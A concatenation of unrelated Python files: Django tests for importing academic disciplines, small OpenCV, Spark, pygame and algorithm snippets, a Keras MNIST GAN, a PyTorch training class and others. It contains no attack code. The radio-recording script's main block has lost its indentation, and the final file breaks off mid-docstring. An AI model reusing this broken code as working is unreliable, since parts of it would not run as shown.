        # Context manager closes the spreadsheet handle deterministically
        # (the original left it open until garbage collection).
        with open(test1_xlsx, "rb") as f:
            i.plik.save("test1.xls", ContentFile(f.read()))
        path = i.plik.path
    i.delete()
    assert not os.path.exists(path)
@pytest.fixture
def testowe_dyscypliny():
    """Create two hidden disciplines (parent 3.2 and child 3.2.1) for the tests below."""
    Dyscyplina_Naukowa.objects.create(nazwa="Testowa", kod="3.2", widoczna=False)
    Dyscyplina_Naukowa.objects.create(nazwa="Jakaś", kod="3.2.1", widoczna=False)
@pytest.fixture
def id_row_1(import_dyscyplin, autor_jan_nowak):
    """Import row carrying both a discipline (3.2) and a sub-discipline (3.2.1)."""
    return Import_Dyscyplin_Row.objects.create(
        parent=import_dyscyplin,
        row_no=1,
        original={},
        dyscyplina="Testowa",
        kod_dyscypliny="3.2",
        subdyscyplina="Jakaś",
        kod_subdyscypliny="3.2.1",
        autor=autor_jan_nowak,
    )
@pytest.fixture
def id_row_2(import_dyscyplin, autor_jan_nowak):
    """Import row carrying only the parent discipline (no sub-discipline)."""
    return Import_Dyscyplin_Row.objects.create(
        parent=import_dyscyplin,
        row_no=1,
        original={},
        dyscyplina="Testowa",
        kod_dyscypliny="3.2",
        subdyscyplina=None,
        kod_subdyscypliny=None,
        autor=autor_jan_nowak,
    )
def test_Import_Dyscyplin_integruj_dyscypliny_pusta_baza(import_dyscyplin, id_row_1):
    """On an empty database, integration creates both disciplines and marks them visible."""
    import_dyscyplin.integruj_dyscypliny()
    assert Dyscyplina_Naukowa.objects.all().count() == 2
    # get() raises if the parent discipline was not created.
    Dyscyplina_Naukowa.objects.get(nazwa="Testowa")
    for elem in Dyscyplina_Naukowa.objects.all():
        assert elem.widoczna
def test_Import_Dyscyplin_integruj_dyscypliny_ta_sama_nazwa_inny_kod(
    import_dyscyplin, id_row_1
):
    """A pre-existing discipline with the same name but a different code: no new
    discipline is created and the row ends up in the BLEDNY (faulty) state."""
    Dyscyplina_Naukowa.objects.create(nazwa="Testowa", kod="0.0")
    import_dyscyplin.integruj_dyscypliny()
    assert Dyscyplina_Naukowa.objects.all().count() == 1
    id_row_1.refresh_from_db()
    assert id_row_1.stan == Import_Dyscyplin_Row.STAN.BLEDNY
def test_Import_Dyscyplin_integruj_dyscypliny_ta_sama_nazwa_inny_kod_sub(
    import_dyscyplin, id_row_1
):
    """Same-name/other-code clash on the SUB-discipline also marks the row faulty."""
    Dyscyplina_Naukowa.objects.create(nazwa="Jakaś", kod="5.3")
    import_dyscyplin.integruj_dyscypliny()
    assert Dyscyplina_Naukowa.objects.all().count() == 2
    id_row_1.refresh_from_db()
    assert id_row_1.stan == Import_Dyscyplin_Row.STAN.BLEDNY
def test_Import_Dyscyplin_integruj_dyscypliny_ukryj_nieuzywane_brak_dyscyplin(
    import_dyscyplin, id_row_1
):
    """With no Autor_Dyscyplina assignments, ukryj_nieuzywane() hides every discipline."""
    import_dyscyplin.integruj_dyscypliny()
    Autor_Dyscyplina.objects.ukryj_nieuzywane()
    assert Dyscyplina_Naukowa.objects.all().count() == 2
    for elem in Dyscyplina_Naukowa.objects.all():
        assert not elem.widoczna
def test_Import_Dyscyplin_integruj_dyscypliny_ukryj_nieuzywane_uzywana_nadrzedna(
    import_dyscyplin, id_row_2, autor_jan_nowak, testowe_dyscypliny
):
    """Integrating a row that uses only the parent discipline makes just that
    one visible; the unused sub-discipline stays hidden."""
    assert Autor_Dyscyplina.objects.count() == 0
    import_dyscyplin.integruj_dyscypliny()
    import_dyscyplin._integruj_wiersze()
    assert Autor_Dyscyplina.objects.count() == 1
    assert Dyscyplina_Naukowa.objects.get(nazwa="Testowa").widoczna
    assert not Dyscyplina_Naukowa.objects.get(nazwa="Jakaś").widoczna
def test_Import_Dyscyplin_integruj_dyscypliny_ukryj_nieuzywane_uzywana_podrzedna(
    import_dyscyplin, id_row_1, testowe_dyscypliny
):
    """A row that also names the sub-discipline leaves both disciplines visible."""
    assert Autor_Dyscyplina.objects.count() == 0
    import_dyscyplin.integruj_dyscypliny()
    import_dyscyplin._integruj_wiersze()
    assert Autor_Dyscyplina.objects.count() == 1
    assert Dyscyplina_Naukowa.objects.get(nazwa="Testowa").widoczna
    assert Dyscyplina_Naukowa.objects.get(nazwa="Jakaś").widoczna
def test_Import_Dyscyplin_sprawdz_czy_poprawne(
    import_dyscyplin, autor_jan_nowak, id_row_1
):
    """After sprawdz_czy_poprawne(), both rows for the same author/discipline
    end up in the BLEDNY (faulty) state."""
    # Second row duplicating id_row_1's author and discipline data.
    id_row_2 = Import_Dyscyplin_Row.objects.create(
        parent=import_dyscyplin,
        row_no=1,
        original={},
        dyscyplina="Testowa",
        kod_dyscypliny="3.2",
        subdyscyplina="Jakaś",
        kod_subdyscypliny="3.2.1",
        autor=autor_jan_nowak,
    )
    import_dyscyplin.integruj_dyscypliny()
    assert id_row_1 in list(import_dyscyplin.poprawne_wiersze_do_integracji())
    import_dyscyplin.sprawdz_czy_poprawne()
    for elem in id_row_1, id_row_2:
        elem.refresh_from_db()
        assert elem.stan == Import_Dyscyplin_Row.STAN.BLEDNY
def test_Import_Dyscyplin_integruj_dyscypliny_zmiana_dyscypliny(
    autor_jan_nowak, rok, import_dyscyplin, id_row_1, testowe_dyscypliny
):
    """Row integration overwrites an author's existing year assignment with the imported discipline."""
    # Set things up so the author already has, for the given year, an
    # assignment to a different discipline than the one in the import row.
    # Row id_row_1 carries 'Testowa' as the discipline...
    ad = Autor_Dyscyplina.objects.create(
        autor=autor_jan_nowak,
        rok=rok,
        dyscyplina_naukowa=Dyscyplina_Naukowa.objects.get(nazwa="Jakaś"),
    )
    import_dyscyplin.integruj_dyscypliny()
    import_dyscyplin._integruj_wiersze()
    ad.refresh_from_db()
    assert ad.dyscyplina_naukowa.nazwa == "Testowa"
def test_Import_Dyscyplin_Row_serialize_dict():
    """serialize_dict() exposes model fields (here: nazwisko) as plain dict entries."""
    x = Import_Dyscyplin_Row(nazwisko="foo", imiona="bar", original={})
    assert x.serialize_dict()["nazwisko"] == "foo"
|
import cv2

# Load the image in color mode (the default; pass flag 0 for grayscale,
# 1 for color).
img = cv2.imread('lena.png')
# cv2.imread returns None instead of raising when the file is missing or
# unreadable -- guard before touching .shape.
if img is None:
    raise FileNotFoundError("lena.png could not be read")
print(img.shape)  # (height, width, channels), e.g. (512, 512, 3)
cv2.imshow('image', img)
cv2.waitKey(0)  # wait indefinitely for any key press
cv2.destroyAllWindows()
|
from pyspark import SparkContext, SparkConf
# Run locally under the app name "RDD Join".
conf = SparkConf().setAppName("RDD Join").setMaster("local")
sc = SparkContext(conf=conf)
# Inner join on the key: "a" matches twice, "b" has no partner and is dropped.
rdd1 = sc.parallelize([("a", 1), ("b", 2)])
rdd2 = sc.parallelize([("a", 2), ("a", 3)])
# Prints [('a', (1, 2)), ('a', (1, 3))]
print(rdd1.join(rdd2).collect())
|
from django.core.mail import EmailMessage
import threading
class EmailThread(threading.Thread):
    """Send a Django EmailMessage on a background thread so the caller is
    not blocked by SMTP I/O."""
    def __init__(self, email):
        # email: a fully prepared django.core.mail.EmailMessage
        self.email = email
        threading.Thread.__init__(self)
    def run(self):
        # Mark the body as HTML just before sending.
        self.email.content_subtype = 'html'
        self.email.send()
class Util:
    """Helpers for sending notification e-mails."""
    @staticmethod
    def send_email(data):
        """Build an EmailMessage from *data* (keys: 'email_subject',
        'email_body', 'to_email') and send it asynchronously via EmailThread."""
        email = EmailMessage(
            subject=data['email_subject'], body=data['email_body'], to=[data['to_email']])
        EmailThread(email).start()
# temp-mail.org : disposable-email site, useful for experimenting
# _____ note:
# This may not work until you change the settings of the company's Google email account.
# Steps:
# 1) go to https://www.google.com/settings/security/lesssecureapps
# 2) switch "Allow less secure apps" from OFF to ON
# for more about the topic please
# visit https://stackoverflow.com/questions/16512592/login-credentials-not-working-with-gmail-smtp
|
def find_leaders(arr):
    """Return the 'leader' elements of *arr*: every element strictly greater
    than all elements to its right; the last element is always a leader.

    Single right-to-left pass with a running suffix maximum -- O(n) instead
    of the original O(n^2) max(arr[i+1:]) per element.
    """
    leaders = [arr[-1]]
    suffix_max = arr[-1]
    for value in reversed(arr[:-1]):
        if value > suffix_max:
            leaders.append(value)
            suffix_max = value
    leaders.reverse()
    return leaders


if __name__ == "__main__":
    # One test case per line-triple: count of cases, n, then the n values.
    for _ in range(int(input())):
        n = int(input())
        arr = list(map(int, input().split()))
        # Same output format as before: leaders space-separated on one line.
        print(" ".join(str(v) for v in find_leaders(arr)))
|
# Generated by Django 2.2.6 on 2019-11-25 13:00
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Creates the ExtendedUser profile model (phone + age) linked 1:1 to the auth user."""
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('producto', '0005_auto_20191114_0037'),
    ]
    operations = [
        migrations.CreateModel(
            name='ExtendedUser',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Phone number capped at 9 digits via MaxValueValidator.
                ('telefono', models.IntegerField(validators=[django.core.validators.MaxValueValidator(999999999)])),
                ('edad', models.IntegerField()),
                # Deleting the auth user cascades to this profile row.
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
class Shop:
    """A shop that tracks its own sold quantity plus a class-wide sales total."""

    _total_sales = 0  # aggregate quantity sold across every Shop instance

    def __init__(self, name, sold_qty):
        self._name = name
        self._sold_qty = sold_qty
        # The initial stock sold counts toward the shared total as well.
        self.update_total_sales(self._sold_qty)

    def change_sold_qty(self, selling_qty):
        """Add *selling_qty* to this shop's tally and to the class-wide total."""
        self._sold_qty = self._sold_qty + selling_qty
        self.update_total_sales(selling_qty)

    @classmethod
    def update_total_sales(cls, selling_qty):
        """Fold *selling_qty* into the shared running total."""
        cls._total_sales = cls._total_sales + selling_qty

    @classmethod
    def get_total_sales(cls):
        """Return the aggregate quantity sold by all shops."""
        return cls._total_sales
if __name__ == '__main__':
    # Both the constructor and change_sold_qty() feed the class-wide total.
    atb = Shop('ATB', 1)
    atb.change_sold_qty(2)    # ATB: 3 sold; total: 3
    silpo = Shop('SILPO', 5)
    silpo.change_sold_qty(3)  # SILPO: 8 sold; total: 11
    print(atb._sold_qty)           # 3
    print(Shop.get_total_sales())  # 11
    print(silpo._sold_qty)         # 8
    print(Shop.get_total_sales())  # 11
import gdal
import ogr
import numpy as np
import geopandas as gpd
import pandas as pd
# read shapefile into a geopandas GeoDataFrame
gdf = gpd.read_file('E://arc//sds//seg//truth_data_subset_utm12.shp')
# get names of land cover classes/labels
class_names = gdf['lctype'].unique()
print('class_name', class_names)
# create a unique id (integer, starting at 1) for each land cover class/label
class_ids =np.arange(class_names.size)+1
print('class ids',class_ids)
# create a pandas DataFrame of the labels and ids and save it to CSV
df = pd.DataFrame({'lctype': class_names, 'id': class_ids})
df.to_csv('E://arc//sds//seg//class_lookup.csv')
print('gdf without ids', gdf.head())
# add a new column to the GeoDataFrame with the id for each class/label
gdf['id'] = gdf['lctype'].map(dict(zip(class_names, class_ids)))
print('gdf with ids', gdf.head())
# split the truth data into 70% training / 30% test sets and save each to a new shapefile
# NOTE(review): sample() is unseeded, so the split differs on every run;
# pass random_state=... for reproducibility.
gdf_train = gdf.sample(frac=0.7)
gdf_test = gdf.drop(gdf_train.index)
print('gdf shape', gdf.shape, 'training shape', gdf_train.shape, 'test', gdf_test.shape)
gdf_train.to_file('E://arc//sds//seg//train.shp')
gdf_test.to_file('E://arc//sds//seg//test.shp')
|
import pygame
import math
# 640x400 window used as the shared drawing surface by levcurve().
monitor = pygame.display.set_mode( (640, 400) )
def levcurve(x, y, l, alpha, n):
    """Recursively draw a Lévy-C-style curve on the global `monitor`.

    Args:
        x, y: start point of the current segment.
        l: segment length (halved in area at each subdivision).
        alpha: segment angle in degrees.
        n: remaining recursion depth; a line is drawn only at n == 0.
    """
    if n > 0 :
        l = l/1.414  # ~ l / sqrt(2): length of each half-segment
        levcurve(x, y, l, (45 + alpha), n-1)
        # Advance to the midpoint reached by the first half-segment.
        x = x + l*math.cos(math.radians(45 + alpha))
        y = y + l*math.sin(math.radians(45 + alpha))
        levcurve(x, y, l, alpha-45, n-1)
    elif n == 0 :
        # `n is 0` compared identity with an int literal (CPython caching
        # detail, SyntaxWarning on 3.8+); use value equality instead.
        pygame.draw.line(monitor, (255, 255, 255), (x, y), ( (x+l*math.cos(math.radians(alpha))), (y+l*math.sin(math.radians(alpha)))), 1)
# Draw the full curve once: start (320, 100), length 100, angle 90 deg, depth 12.
levcurve(320, 100, 100, 90, 12)
on = True
while on:
    # Keep presenting the already-drawn frame until the window is closed.
    pygame.display.flip()
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            on = False
pygame.quit()
|
'''
Define a function is_palindrome() that recognizes palindromes (i.e. words that look the same written backwards). For example, is_palindrome("radar") should return True.
'''
# helper function
def palindrome(string):
    """Return 'true' if *string* reads the same backwards, else 'false'.

    The original implementation compared only the single character pair at
    index len(string)/2 - 1, so e.g. "Xbba" was wrongly reported as a
    palindrome; every mirrored pair must match.
    """
    if string == string[::-1]:
        return 'true'
    else:
        return 'false'
#main function
if __name__ == "__main__":
    res = 0
    # NOTE(review): raw_input is Python 2 only; under Python 3 this would be input().
    string = raw_input("Enter a string: ")
    res = palindrome(string)
    # palindrome() returns the strings 'true'/'false', not booleans.
    if(res == 'true'):
        print("true")
    else:
        print("False")
|
####################################################################################
# Note: 5th.
# Author: Gang-Cheng Huang (Jacky5112)
# Date: Dec.9, 2020
# Lecture: Information Security Training and Education Center, C.C.I.T., N.D.U., Taiwan
####################################################################################
from keras.datasets import mnist
from keras.layers import Input, Dense, Reshape, Flatten, Dropout
from keras.layers import BatchNormalization, Activation, ZeroPadding2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
from keras.models import Sequential, Model
from keras import optimizers
import matplotlib.pyplot as plt
import numpy as np
import common
# init
img_width, img_height, channels = 28, 28, 1  # MNIST: 28x28 grayscale
img_shape = (img_width, img_height, channels)
learning_rate = 0.0001
epochs = 50000            # number of adversarial training iterations
batch_size = 32
sample_interval = 500     # save sample images every N iterations
latent_dim = 100          # size of the generator's noise input
# ================================================================
# load mnist data
(X_train, _), (_, _) = mnist.load_data()
# rescale pixels from [0, 255] to [-1, 1] to match the generator's tanh output
X_train = X_train / 127.5 - 1.
X_train = np.expand_dims(X_train, axis=3)
# discriminator targets: 1 for real images, 0 for generated ones
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
# ================================================================
# ================================================================
# generator
def BuildGeneratorModel():
    """Build the GAN generator: latent noise (latent_dim) -> 28x28x1 image in [-1, 1]."""
    model = Sequential([
        Dense(256, input_dim=latent_dim),
        LeakyReLU(0.2),
        BatchNormalization(momentum=0.8),
        Dense(512),
        LeakyReLU(0.2),
        BatchNormalization(momentum=0.8),
        Dense(1024),
        LeakyReLU(0.2),
        BatchNormalization(momentum=0.8),
        Dense(np.prod(img_shape), activation='tanh'),
        Reshape(img_shape)
    ])
    ## debug use
    print ("generator:")
    print (model.summary())
    noise = Input(shape=(latent_dim,))
    image = model(noise)
    return Model(noise, image)
# ================================================================
# ================================================================
# discriminator
def BuildDiscriminatorModel():
    """Build the discriminator: 28x28x1 image -> sigmoid probability the image is real."""
    model = Sequential([
        Flatten(input_shape=img_shape),
        Dense(512),
        LeakyReLU(0.2),
        Dense(256),
        LeakyReLU(0.2),
        Dense(1, activation='sigmoid')
    ])
    ## debug use
    print ("discriminator:")
    print (model.summary())
    image = Input(shape=img_shape)
    validity = model(image)
    return Model(image, validity)
# ================================================================
# ================================================================
# build model
# build and compile the discriminator
discriminator = BuildDiscriminatorModel()
discriminator.compile(loss='binary_crossentropy',
                      optimizer=optimizers.Adam(lr=learning_rate),
                      metrics=['accuracy'])
# Freeze the discriminator for the combined model so only the generator is
# updated there; the flag takes effect at combined.compile() below.
discriminator.trainable = False
# build the generator
generator = BuildGeneratorModel()
# generator generates images with noise
z = Input(shape=(latent_dim,))
image = generator(z)
validity = discriminator(image)
# combined model: noise -> generated image -> discriminator verdict
combined = Model(z, validity)
combined.compile(loss='binary_crossentropy',
                 optimizer=optimizers.Adam(lr=learning_rate))
# ================================================================
# ================================================================
# training
for cnt in range(epochs):
    #-------------------------------------------------------------
    # train discriminator on a half-real, half-generated batch
    idx = np.random.randint(0, X_train.shape[0], batch_size)
    images = X_train[idx]
    noise = np.random.normal(0, 1, (batch_size, latent_dim))
    # generate a batch of new images
    gen_images = generator.predict(noise)
    d_loss_real = discriminator.train_on_batch(images, valid)
    d_loss_fake = discriminator.train_on_batch(gen_images, fake)
    d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
    #-------------------------------------------------------------
    #-------------------------------------------------------------
    # train generator: push the (frozen) discriminator toward labeling
    # generated images as "valid"
    noise = np.random.normal(0, 1, (batch_size, latent_dim))
    g_loss = combined.train_on_batch(noise, valid)
    #-------------------------------------------------------------
    # save generator sample images periodically
    if cnt % sample_interval == 0:
        common.sample_images(cnt, generator, latent_dim)
# ================================================================
|
import requests

# Course-listing endpoint for MAT137; all other filters left blank.
# NOTE: the original query string contained "§ion=" -- mojibake for
# "&section=" (the "&sect" prefix was rendered as the section sign).
url = ('https://timetable.iit.artsci.utoronto.ca/api/20199/courses'
       '?org=&code=MAT137&section=&studyyear=&daytime=&weekday='
       '&prof=&breadth=&online=&waitlist=&available=&title=')

# (Removed an unused `params` dict copied from an unrelated Google Maps
# example -- it was never passed to the request.)
resp = requests.get(url=url)
data = resp.json()  # Check the JSON Response Content documentation below
print(data)
print("hello world")
from multiprocessing import Process, Queue
import os
import argparse
import time
# Local imports
from data_collection.collect_stream import collect_stream
from data_collection.collect_radio import collect_radio
# from data_collection.data_utils import monitor_song_name, get_song_name
def main(freq=None, url=None, stream_format='.aac', genre='classical', rate=44100, duration=30, dest='../data'):
    """Records music of a certain type simultaneously from an internet streaming service
    and over the radio.
    Args:
        freq (float): the FM radio frequency to record
        url (str): the url to collect streamed audio
        stream_format (str): the format of the streamed audio
        genre (str): the genre label passed to both collectors
        rate (int): the sample rate at which to record
        duration (int): the maximum song length in minutes
        dest (str): the destination to store the recorded audio
    """
    if not os.path.exists(dest):
        os.makedirs(dest)
    # Record forever in `duration`-minute chunks; each chunk gets a fresh
    # pair of worker processes.
    while True:
        # Define Queue objects to pass stop signals to child processes
        q1 = Queue()
        q2 = Queue()
        # Define worker processes: one for FM radio, one for the stream
        p1 = Process(target=collect_radio, args=(q1, freq, genre, rate, dest))
        p2 = Process(target=collect_stream, args=(q2, url, stream_format, genre, rate, dest))
        try:
            # Start worker processes
            p1.start()
            p2.start()
            # Record for specified duration
            time.sleep(duration * 60)
        finally:
            # Signal to the processes to quit, then wait for them to exit
            q1.put(True)
            q2.put(True)
            p1.join()
            p2.join()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--freq', required=True, type=float,
help='The FM frequency to record.')
parser.add_argument('-u', '--url', required=True, type=str,
help='The url for the streamed radio to record.')
parser.add_argument('-s', '--stream_format', required=False, type=str, default='.aac',
help='The audio format of the incoming streamed audio.')
parser.add_argument('-g', '--genre', required=False, type=str, default='DefaultGenre',
help='The genre of the radio station.')
parser.add_argument('-r', '--rate', required=False, type=int, default=44100,
help='The sample rate for the recorded audio')
parser.add_argument('-d', '--duration', required=False, type=float, default=30,
help='The max song duration (in minutes)')
parser.add_argument('--dest', required=False, type=str, default='../data',
help='The path for the recorded audio')
args = parser.parse_args()
main(args.freq,
args.url,
args.stream_format,
args.genre,
args.rate,
args.duration,
args.dest,) |
from datetime import datetime
import dash
import dash_html_components as html
from dash.dependencies import Input, Output
# Dash app mounted under /app2/ (served behind a dispatcher/proxy).
app = dash.Dash(__name__, requests_pathname_prefix='/app2/')
app.title = 'App2'
layout = html.Div([
    html.H1('App2'),
    html.P(id='placeholder'),  # filled in by the update() callback below
    html.Button('Update', 'update_button'),
    html.Br(),
    html.A('Home', href='/'),
    html.Br(),
    html.A('App1', href='/app1'),
])
app.layout = layout
@app.callback(Output('placeholder', 'children'),
              [Input('update_button', 'n_clicks')])
def update(n_clicks):
    """Refresh the placeholder with the current HH:MM:SS time on each button click."""
    return datetime.now().strftime('%H:%M:%S')
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from manual.service import v1
from app01 import models
# Register the UserInfo model with the custom v1 service site (admin-style registry).
v1.site.register(models.UserInfo)
|
"""
Attelo command configuration
"""
from collections import namedtuple
import six
# pylint: disable=too-few-public-methods
def combined_key(variants):
    """Build a single '-'-joined key from *variants*, where each item is
    either a plain string or an object exposing a ``key`` attribute."""
    parts = []
    for variant in variants:
        if isinstance(variant, six.string_types):
            parts.append(variant)
        else:
            parts.append(variant.key)
    return '-'.join(parts)
# Flag bundle selecting an intra/inter-sentential decoding strategy and
# whether to use an oracle at each level.
IntraFlag = namedtuple('IntraFlag',
                       ['strategy',
                        'intra_oracle',
                        'inter_oracle'])
"""
Sort of a virtual flag for enabling intrasentential decoding
"""
# key: combined identifier; intra: IntraFlag or None; mode: decoding mode.
Settings = namedtuple('Settings',
                      ['key', 'intra', 'mode'])
"""
Global settings for decoding and for decoder construction
"""
# Pairs a decoder payload with its key and the Settings used to build it.
KeyedDecoder = namedtuple('KeyedDecoder',
                          ['key',
                           'payload',
                           'settings'])
"""
A decoder and some decoder settings that together with it
Note that this is meant to be duck-type-compatible with
Keyed(Decoder)
"""
def _attelo_fold_args(lconf, fold):
    """
    Return flags for picking out the attelo fold file (and fold
    number), if relevant
    """
    flags = []
    if fold is not None:
        flags.extend(["--fold", str(fold)])
        flags.extend(["--fold-file", lconf.fold_file])
    return flags
|
import logging
import os
import shutil
import torch
import torch.nn.functional as F
import torch.optim as optim
from tqdm import tqdm
from . import data_utils
from . import networks
from .evaluate import evaluate
from .utils import AverageMeter, Timer, dump_log
class Model(object):
    """High level model that handles initializing the underlying network
    architecture, saving, updating examples, and predicting examples.
    """

    def __init__(self, config, word_dict=None, classes=None, ckpt=None):
        """Set up vocabulary, embeddings, network and optimizer.

        Args:
            config: experiment configuration (device, model_name, embed_file, ...).
            word_dict: vocabulary object; ignored when `ckpt` is given.
            classes: list of class labels; ignored when `ckpt` is given.
            ckpt: checkpoint dict produced by save(); when given, run state,
                vocabulary, classes and weights are restored from it.
        """
        self.config = config
        self.device = config.device
        self.start_epoch = 0

        if ckpt:
            # Resume: restore the bookkeeping state written by save().
            self.config.run_name = ckpt['run_name']
            self.word_dict = ckpt['word_dict']
            self.classes = ckpt['classes']
            self.best_metric = ckpt['best_metric']
            self.start_epoch = ckpt['epoch']
        else:
            self.word_dict = word_dict
            self.classes = classes
            self.start_epoch = 0
            self.best_metric = 0

        # load embedding: a local vector file takes precedence, otherwise
        # treat embed_file as a torchtext pretrained-embedding name.
        if os.path.exists(config.embed_file):
            logging.info(f'Load pretrained embedding from file: {config.embed_file}.')
            embedding_weights = data_utils.get_embedding_weights_from_file(self.word_dict, config.embed_file)
            self.word_dict.set_vectors(self.word_dict.stoi, embedding_weights,
                                       dim=embedding_weights.shape[1], unk_init=False)
        elif not config.embed_file.isdigit():
            logging.info(f'Load pretrained embedding from torchtext.')
            self.word_dict.load_vectors(config.embed_file)
        else:
            raise NotImplementedError

        self.config.num_classes = len(self.classes)
        embed_vecs = self.word_dict.vectors
        self.network = getattr(networks, config.model_name)(config, embed_vecs).to(self.device)
        self.init_optimizer()

        if ckpt:
            self.network.load_state_dict(ckpt['state_dict'])
            self.optimizer.load_state_dict(ckpt['optimizer'])
        elif config.init_weight is not None:
            init_weight = networks.get_init_weight_func(config)
            self.network.apply(init_weight)

    def init_optimizer(self, optimizer=None):
        """Initialize an optimizer for the free parameters of the network.

        Args:
            optimizer: optimizer name ('sgd' or 'adam'); defaults to
                self.config.optimizer.
        """
        parameters = [p for p in self.network.parameters() if p.requires_grad]
        optimizer_name = optimizer or self.config.optimizer
        if optimizer_name == 'sgd':
            self.optimizer = optim.SGD(parameters, self.config.learning_rate,
                                       momentum=self.config.momentum,
                                       weight_decay=self.config.weight_decay)
        elif optimizer_name == 'adam':
            self.optimizer = optim.Adam(parameters, weight_decay=self.config.weight_decay, lr=self.config.learning_rate)
        else:
            raise RuntimeError('Unsupported optimizer: %s' % self.config.optimizer)
        # NOTE: gradient clipping moved to train_step(); calling
        # clip_grad_value_ here was a no-op because no gradients exist
        # before the first backward pass.

    def train(self, train_data, val_data):
        """Run the training loop with early stopping on the validation metric."""
        train_loader = data_utils.get_dataset_loader(
            self.config, train_data, self.word_dict, self.classes,
            shuffle=self.config.shuffle, train=True)
        val_loader = data_utils.get_dataset_loader(
            self.config, val_data, self.word_dict, self.classes, train=False)

        logging.info('Start training')
        try:
            epoch = self.start_epoch + 1
            patience = self.config.patience
            while epoch <= self.config.epochs:
                if patience == 0:
                    logging.info('Reach training patience. Stopping...')
                    break

                logging.info(f'============= Starting epoch {epoch} =============')
                self.train_epoch(train_loader)

                timer = Timer()
                logging.info('Start predicting a validation set')
                val_metrics = evaluate(model=self, dataset_loader=val_loader, monitor_metrics=self.config.monitor_metrics)
                metric_dict = val_metrics.get_metric_dict(use_cache=False)
                logging.info(f'Time for evaluating val set = {timer.time():.2f} (s)')
                dump_log(self.config, metric_dict, split='val')
                print(val_metrics)

                if metric_dict[self.config.val_metric] > self.best_metric:
                    # New best model: save and reset the patience counter.
                    self.best_metric = metric_dict[self.config.val_metric]
                    self.save(epoch, is_best=True)
                    patience = self.config.patience
                else:
                    logging.info(f'Performance does not increase, training will stop in {patience} epochs')
                    self.save(epoch)
                    patience -= 1
                epoch += 1
        except KeyboardInterrupt:
            logging.info('Training process terminated')

    def train_epoch(self, data_loader):
        """Run through one epoch of model training with the provided data loader."""
        train_loss = AverageMeter()
        epoch_time = Timer()
        progress_bar = tqdm(data_loader)

        for idx, batch in enumerate(progress_bar):
            loss, batch_label_scores = self.train_step(batch)
            train_loss.update(loss)
            progress_bar.set_postfix(loss=train_loss.avg)
        logging.info(f'Epoch done. Time for epoch = {epoch_time.time():.2f} (s)')
        logging.info(f'Epoch loss: {train_loss.avg}')

    def train_step(self, inputs):
        """Forward a batch of examples, backprop, and step the optimizer.

        Args:
            inputs: batch dict with (at least) 'text' and 'label' tensors.

        Returns:
            (loss_value, batch_label_scores): scalar float loss and the
            per-label sigmoid scores for the batch.
        """
        # Train mode
        self.network.train()
        for key in inputs:
            if isinstance(inputs[key], torch.Tensor):
                inputs[key] = inputs[key].to(self.device, non_blocking=True)

        # Run forward
        target_labels = inputs['label']
        outputs = self.network(inputs['text'])
        pred_logits = outputs['logits'] if isinstance(outputs, dict) else outputs
        loss = F.binary_cross_entropy_with_logits(pred_logits, target_labels)
        batch_label_scores = torch.sigmoid(pred_logits)

        # Update parameters
        self.optimizer.zero_grad()
        loss.backward()
        # Clip AFTER backward so the clamp acts on the freshly computed
        # gradients; the original call in init_optimizer ran before any
        # gradients existed and therefore had no effect.
        torch.nn.utils.clip_grad_value_(self.network.parameters(), 0.5)
        self.optimizer.step()
        return loss.item(), batch_label_scores

    def predict(self, inputs):
        """Forward a batch of examples only to get predictions.

        Args:
            inputs: the batch of inputs

        Returns:
            {
                'scores': sigmoid label scores,
                'logits': raw network logits,
                'outputs': full network output,
            }
        """
        # Eval mode
        self.network.eval()
        # Transfer to GPU
        for key in inputs:
            if isinstance(inputs[key], torch.Tensor):
                inputs[key] = inputs[key].to(self.device, non_blocking=True)
        # Run forward
        with torch.no_grad():
            outputs = self.network(inputs['text'])
            logits = outputs['logits']
            batch_label_scores = torch.sigmoid(logits)
        return {
            'scores': batch_label_scores,
            'logits': logits,
            'outputs': outputs,
        }

    def save(self, epoch, is_best=False):
        """Write the current state to model_last.pt (and model_best.pt if is_best)."""
        self.network.eval()
        ckpt = {
            'epoch': epoch,
            'run_name': self.config.run_name,
            'state_dict': self.network.state_dict(),
            'word_dict': self.word_dict,
            'classes': self.classes,
            'optimizer': self.optimizer.state_dict(),
            'best_metric': self.best_metric,
        }
        ckpt_path = os.path.join(self.config.result_dir,
                                 self.config.run_name, 'model_last.pt')
        os.makedirs(os.path.dirname(ckpt_path), exist_ok=True)
        logging.info(f"Save current model: {ckpt_path}")
        torch.save(ckpt, ckpt_path)
        if is_best:
            best_ckpt_path = ckpt_path.replace('last', 'best')
            logging.info(f"Save best model ({self.config.val_metric}: {self.best_metric}): {best_ckpt_path}")
            shutil.copyfile(ckpt_path, best_ckpt_path)
        self.network.train()

    @staticmethod
    def load(config, ckpt_path):
        """Rebuild a Model from a checkpoint file."""
        ckpt = torch.load(ckpt_path)
        return Model(config, ckpt=ckpt)

    def load_best(self):
        """Swap in the network weights from this run's model_best.pt."""
        best_ckpt_path = os.path.join(self.config.result_dir,
                                      self.config.run_name, 'model_best.pt')
        best_model = self.load(self.config, best_ckpt_path)
        self.network = best_model.network
|
import json
import numpy as np
import math
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
import os
import scipy
from scipy import misc
import cv2
import glob
import numpy as np
def initialization(k, c):
    """He-style initializer for a k x k conv with c input channels: N(0, sqrt(2 / (k^2 * c)))."""
    std = math.sqrt(2. / (k ** 2 * c))
    return tf.truncated_normal_initializer(stddev=std)
def conv_layer(x, name, shape, vgg_weights=None, use_vgg=False):
    """Convolution + bias + batch norm + ReLU block.

    Args:
        x: input tensor (NHWC).
        name: variable scope name; when use_vgg, also the key into vgg_weights.
        shape: filter shape [k, k, in_channels, out_channels].
        vgg_weights: dict mapping scope name -> (weights, biases); used only
            when use_vgg is True.
        use_vgg: initialize weights/biases from the pretrained VGG dict.

